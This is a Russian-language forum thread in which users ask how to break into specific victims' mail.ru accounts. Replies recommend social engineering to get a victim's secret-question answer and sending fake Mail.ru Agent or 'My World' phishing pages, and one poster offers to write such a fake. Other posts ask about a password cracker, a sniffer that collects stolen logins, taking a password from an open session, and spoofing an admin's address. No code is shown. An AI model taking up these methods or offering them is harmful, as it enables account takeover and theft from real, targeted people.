Почему сообщения не доходят ? анонимка работает нормально. Когда убираю строку то сообщения приходят в чем причина?
Раньше всё работало (

в общем всем Здрасте!!! как взломать почту на mail.ru если жертва сидит тупо в мобильном Агенте? я знал старый пароль, и эта сцука его пару дней назад поменяла.. что можно придумать? КТО НИБУДЬ ПодСкаЖиТе??

Bes_berencev, используй СИ. узнай ответ на секретный вопрос у жертвы или подсунь ему фейк мобильного агента!
igor312, используй фейк Моего Мира. Или программный подсунь(разная тематика) стукни в ЛС, я те напишу фейк программный

Люди ответьте в лс мне программа Mail.ru Pass cracker 2.0 работает или это лохо*** ???

почему логи не приходят на сниф? не могу понять, адрес правильно указываю, но данные не приходят? если их реально тестом вводишь?

А если у меня на компе открыто мыло жертвы (т.е. я могу лазить по его ящику и в его "моем мире" можно от туда стащить пароль как нибудь???

Интересный вопрос. Чтоб поменять настройки (секретный вопрос, пароль) необходимо знать текущий пароль. Мож кто подскажет?

Смены пасса под сессией на данный момент либо просто нет, либо ещё на нашёлся добродушный идиот, который сольёт способ в паблик))

Долго меня не было, народ помогай. нужно чтоб отправить с имя админа письмо по май.ру . пишите в личку.